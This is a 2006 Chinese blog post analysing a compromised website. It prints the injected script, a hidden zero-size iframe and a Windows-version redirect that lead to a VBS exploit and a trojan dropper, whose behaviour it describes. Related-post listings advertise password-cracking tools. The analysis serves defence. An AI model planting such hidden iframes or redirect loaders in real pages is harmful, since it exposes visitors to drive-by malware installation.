关于hxxp://www.hj234.com的问题

最新推荐文章于 2017-06-03 13:23:17 发布
最新推荐文章于 2017-06-03 13:23:17 发布
阅读量9.9k 收藏
点赞数
分类专栏: 原创作品 系统安全 系统维护 文章标签: javascript windows ie iframe vb c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/675821
版权

endurer 原创

2006-04-24 第1

在hxxp://www.hj234.com的主页有代码:

 

 

<script language=JavaScript src="hxxp://www.***hj234.com/abc/abc.js"></script>

 

 

hxxp://www.***hj234.com/abc/abc.js的内容为:

 


document.write("<iframe height=0 width=0 frameborder=0 src='hxxp://www.***hj234.com/abc/joke.htm'></iframe>")

 

 

 

hxxp://www.***hj234.com/abc/joke.htm的内容为:

 


 <center><font color=red>对不起,您访问的页面不存在!</font><center>                             <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

 

 

 

会根据浏览者所用Windows版本,打开windows.htm,winnt.htm或w98.htm

从这个网页开始,所用的技术与发现一个使用技术升级、下载灰鸽子的网站相同。

这3个网页会下载/运行文件young.gifyoung.css

young.gif 是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。
江民KV2006报为Exploit.VBS.Phel.ba

young.css 用VB6编写,修改IE启动页,创建名为services.exe的文件,并在注册表的run键加入开机启动项,江民KV2006报为TrojanDropper.Delf.d

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
压缩包密码破解及各类文档密码破解软件.rar
06-23
该资源包含多种密码破解软件,rar文件、zip文件、pdf文件、word文件、ppt文件、excel文件等,有需要的用户可以下载使用。
不怕死就上这些网站
热门推荐
临时工 Temporary's Space
08-14 10万+
 1. hxxp:///www.dj3344.com 打开后,重启时你的主页就变成它的,并通过QQ向他人传播,现在正飙行,奇坏无比!2. hxxp:///www.qq168.net 打开后,重启时你的主页就变成它的,并通过QQ向他人传播,而且传波病毒,还狠些!现在正在飙行!3. hxxp:///www.777888.com  4. hxxp:///WWW.5dsoft.com  5. hx
恶意网站http://www.chaxun.com,近日不断受到这个无耻网站的弹出广告骚扰(已找到解决方法)
小小草草的家家
08-11 1万+
弹出窗口的网址有如下两个:www.myip.cn和www.chaxun.com强忍怒火,去这两个网址看个究竟,原来就是下边这么弱智:screen.width-500)this.style.width=screen.width-500;" border="1" alt=""/>如果点击弹出窗口内的内容,将会访问到其他一些垃圾网站(估计是前者的客户)这个弱智网站,他们这种无耻行径,只会落得早日归天。下
不错的网站http://www.itlearner.com/
xiexy的专栏
07-18 5305
http://www.itlearner.com
www.5dkb.com我的电影网站
ami500101的博客
07-29 1万+
欢迎在闲暇之余来我的电影网,看看电影!放松心情…… 不好的地方!还请大家多多指教!告诉我你们宝贵的意见!!!! 我会尽力做到你们满意!谢谢…… 转载于:https://www.cnblogs.com/dream_liujia/archive/2010/07/29/1787754.html...
Android 你应该知道的学习资源 进阶之路贵在坚持
weixin_30537451的博客
01-22 215
1、国外教程网站 Android Developers Blog 不解释 vogella 很不错的网站,免费的,包含android的教程也比较全面,并且教程中经常引用大牛blog,会有很多意外发现。代码资源有提供,但是不是很好找。 非常推荐 tutorialspoint 非常适合入门,提供基本所有的基础教程,并且N多的例子。除了支持...
某养生健康网站源码 v1.0
10-24
收集自网络。亲测完整无错。...-->完成后进入后台后台是/admin 2. 然后点系统--数据库备份/还原--还原数据 -->还原完成后 -->...)3....) 4....附:根据二00二年一月一日《计算机软件保护条例》规定:为了学习和研究...
argon24MB密码破解字典
04-06
该字典为argon24mb文件,用于arpr软件破解解压密码使用,整整 22349627 行短语/字串
winrar压缩文件密码破解
11-19
Argon Wordlist: hXXp://newdata.box.sk/argon24MB.zip 这个字典真是狂猛,整整 22349627 行短语/字串 本汉化版基于本人发布于世纪的 1.52 语言文件升级汉化(转为直汉版),目的是为了处理部分硬编码字符,...
234X网址导航系统.rar
07-08
234X网址导航系统是采用PHP MYSQL制作的功能全面的网址导航系统,它拥有功能完整的后台管理系统,可以不限分类级数,无限添加站点。可以自定义模板,一键生成全站HTML,便于搜索引擎收录。可自定义广告,使网站可以获得收益。234X网址导航系统还有用户收藏和浏览记录功能,使网站功能更加强大。 【软件功能特点】 1.不限分类级数,随心所欲添加分类,摆脱多级分类困扰; 2.自定义站点显示颜色,推荐等,使好站更容易被发现; 3.自定义广告,无需修改文件即可修改广告,摆脱修改广告困扰; 4.用户注册功能,用户注册后可自定义收藏; 5.收录申请管理,使收录申请简单无忧; 5.自定义系统变量,常用字符后台同意修改; 6.自定义模板功能,多种模板随意切换; 7.插件管理功能,使网站功能更强大; 8.可添加多个管理员,共同管理网站,使网站维护更容易; 9.全站采用静态HTML,一键生成全站,便于搜索引擎收录; 10.数据备份恢复功能,一个备份,解决数据丢失问题; 安装: 上传到WEB空间,然后使用浏览器访问 http://你的域名/install/ 安装系统。 (需要将www.234x.com换成你自己的域名,下同) 注意,上传的时候要使用二进制方式上传,否则可能导致程序损坏,不能使用。 注意安装时数据库字段请保存默认,不要改动,可以改下管理员与密码 如果您不会安装,请与我们的客服群联系  Q Q群:113596130   管理: 使用浏览器访问 http://你的域名/admin/ ,登录管理。 admin目录可以任意改名。为使你的网站更安全,建议将admin目录改成其它名字。   如有其它不明事项或需要技术支持,请联系QQ群:113596130。 官方网站:http://www.234.com/ 我们的口号:提倡免费 自由 共享的精神,为千万网民开启进入互联网的大门!
弱口令字典1500
卧龙居
03-29 4万+
123456789 1234567890 a123456789 123456 qq123456 abc123456 123456789a WOAINI1314 12345678 11111111 123123123 88888888 111111111 147258369 987654321 1111111111 1qaz2wsx 789456123 ilove
www.520520.com
cd8405160的专栏
08-03 2万+
sdfsdfsdffffffffffffffsdfsdfsdfsdfsdfsdfsdfsdf
http://www.cnblogs.com/gaoxiang12/
yyp1164868098的专栏
06-03 4263
slam
状态栏着色
leilifengxingmw的博客
10-11 3687
【代码】状态栏着色。
如何去掉流氓网站http://www.2345.com/?177
aft71472的博客
07-22 3025
晚上十二点朋友打电话给我,说自己的电脑打开IE时,IE的默认地址被改成了http://www.2345.com/?177解决过程 1.远程协助看了帮他把注册表"start page"的所以值都改成了"about:blank",点桌面上的IE,一切正常,后来点了快捷方式,IE又会变成: http://www.2345.com/?177...
历数25个最损的中文网站
技术就是个纸老虎---为之,则难者亦易矣;不为,则易者亦难矣。
01-01 1万+
1.hxxp:///www.dj3344.com 打开后,重启时你的主页就变成它的,并通过QQ向他人传播,现在正飙行,奇坏无比! 2. hxxp:///www.qq168.net 打开后,重启时你的主页就变成它的,并通过QQ向他人传播,而且传波病毒,还狠些!现在正在飙行! 3. hxxp:///www.777888.com   4. hxxp:///WWW.5dsoft.com   5. hxxp
给图片加水印_转自聚教程网http://www.111cn.net/js_a/javascript/37250.htm
fengyong7723131的专栏
07-10 6168
javascript canvas给图片加水印 添加水印 * {margin: 0; padding: 0;} [.设置图片 --> --> .水印内容   ].效果 加阴影 
推荐几个网站www.mfdzs.com 免费电子书下载
lykele的博客
07-04 3189
www.mfdzs.com 免费电子书下载 www.txtwb.com手机小说下载 www.66ring.com 手机铃声下载
hxxp://www.54kk.com
最新发布
01-30
根据提供的引用内容,hxxp://www.54kk.com 是一个网址。...如果你想了解更多关于hxxp://www.54kk.com的信息,我建议你使用安全的网络浏览器打开该网址,并确保你的计算机有最新的防病毒软件和防火墙保护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值